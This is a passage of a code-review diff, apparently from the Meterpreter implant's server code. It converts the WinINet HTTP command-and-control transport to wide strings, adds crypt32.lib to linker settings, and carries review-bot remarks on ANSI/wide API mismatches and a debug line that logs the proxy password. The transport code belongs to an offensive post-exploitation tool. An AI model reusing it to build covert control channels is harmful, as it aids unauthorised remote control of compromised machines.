remote->hInternet = InternetOpen(pMetUA, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
|
||||
}
|
||||
@ -45,22 +48,22 @@ DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iE
|
||||
dprintf("[DISPATCH] Configured hInternet: 0x%.8x", remote->hInternet);
|
||||
|
||||
// The InternetCrackUrl method was poorly designed...
|
||||
memset(tmpHostName, 0, sizeof(tmpHostName));
|
||||
memset(tmpUrlPath, 0, sizeof(tmpUrlPath));
|
||||
ZeroMemory(tmpHostName, sizeof(tmpHostName));
|
||||
ZeroMemory(tmpUrlPath, sizeof(tmpUrlPath));
|
||||
ZeroMemory(&bits, sizeof(bits));
|
||||
|
||||
memset(&bits, 0, sizeof(bits));
|
||||
bits.dwStructSize = sizeof(bits);
|
||||
bits.dwHostNameLength = sizeof(tmpHostName)-1;
|
||||
bits.dwHostNameLength = HOSTNAME_LEN - 1;
|
||||
bits.lpszHostName = tmpHostName;
|
||||
bits.dwUrlPathLength = sizeof(tmpUrlPath)-1;
|
||||
bits.dwUrlPathLength = URLPATH_LEN - 1;
|
||||
bits.lpszUrlPath = tmpUrlPath;
|
||||
|
||||
InternetCrackUrl(remote->url, 0, 0, &bits);
|
||||
|
||||
remote->uri = _strdup(tmpUrlPath);
|
||||
remote->uri = _wcsdup(tmpUrlPath);
|
||||
|
||||
dprintf("[DISPATCH] Configured URL: %s", remote->uri);
|
||||
dprintf("[DISPATCH] Host: %s Port: %u", tmpHostName, bits.nPort);
|
||||
dprintf("[DISPATCH] Configured URL: %S", remote->uri);
|
||||
dprintf("[DISPATCH] Host: %S Port: %u", tmpHostName, bits.nPort);
|
||||
|
||||
// Allocate the connection handle
|
||||
remote->hConnection = InternetConnect(remote->hInternet, tmpHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
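Review bot: `tmpHostName` is now a `wchar_t` buffer (declared in the preceding hunk) but is still passed to `InternetConnect` on the last line of this hunk without the `W` suffix the commit adds to `HttpOpenRequestW` and `InternetSetOptionW` elsewhere; unless the build defines `UNICODE`, this resolves to `InternetConnectA`, which reads the buffer as a narrow string and sees only the first character of the host name. The same applies to `InternetOpen(pMetUA, …)` in the previous hunk, to `InternetCrackUrl(remote->url, …)` here if `remote->url` is wide, and to both `InternetSetOption` calls in the proxy-authentication hunk below, where wide strings are passed with `wcslen`-based lengths. Use the explicit wide variant, `remote->hConnection = InternetConnectW(remote->hInternet, tmpHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);`, so behaviour does not depend on project-wide character-set settings. server_dispatch_http_wininet continues past the end of this hunk.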
|
||||
@ -73,11 +76,11 @@ DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iE
|
||||
dprintf("[DISPATCH] Configured hConnection: 0x%.8x", remote->hConnection);
|
||||
|
||||
//authentication
|
||||
if (!(strcmp(pMetProxyUser, "METERPRETER_USERNAME_PROXY") == 0))
|
||||
if (!(wcscmp(pMetProxyUser, L"METERPRETER_USERNAME_PROXY") == 0))
|
||||
{
|
||||
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_USERNAME, pMetProxyUser, (DWORD)strlen(pMetProxyUser) + 1);
|
||||
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_PASSWORD, pMetProxyPass, (DWORD)strlen(pMetProxyPass) + 1);
|
||||
dprintf("[DISPATCH] Proxy authentication configured : %s/%s", pMetProxyUser, pMetProxyPass);
|
||||
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_USERNAME, pMetProxyUser, (DWORD)wcslen(pMetProxyUser) + 1);
|
||||
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_PASSWORD, pMetProxyPass, (DWORD)wcslen(pMetProxyPass) + 1);
|
||||
dprintf("[DISPATCH] Proxy authentication configured : %S/%S", pMetProxyUser, pMetProxyPass);
|
||||
}
|
||||
|
||||
// Bring up the scheduler subsystem.
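Review bot: The debug line `dprintf("[DISPATCH] Proxy authentication configured : %S/%S", pMetProxyUser, pMetProxyPass);` writes the proxy password to the debug output; it only compiles in with `DEBUGTRACE`, but credentials should not reach a log at any level. Print the user name only, e.g. `dprintf("[DISPATCH] Proxy authentication configured for user %S", pMetProxyUser);`. The two `InternetSetOption` calls above it now pass wide strings with `wcslen`-based lengths but keep the suffix-less name, so they resolve to the ANSI variant when `UNICODE` is not defined; `InternetSetOptionW`, as used in the WinINet receive hunk, makes the intent explicit. server_dispatch_http_wininet continues outside this hunk.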
|
||||
|
@ -171,7 +171,7 @@
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\common\$(Configuration); ..\..\source\openssl\lib\win\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -232,7 +232,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\common\$(Configuration); ..\..\source\openssl\lib\win\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -294,7 +294,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\common\$(Configuration);..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -355,7 +355,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\common\$(Configuration);..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -419,7 +419,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\common\$(Configuration); ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -486,7 +486,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\common\$(Configuration); ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -553,7 +553,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\common\$(Configuration);..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -619,7 +619,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\common\$(Configuration);..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
|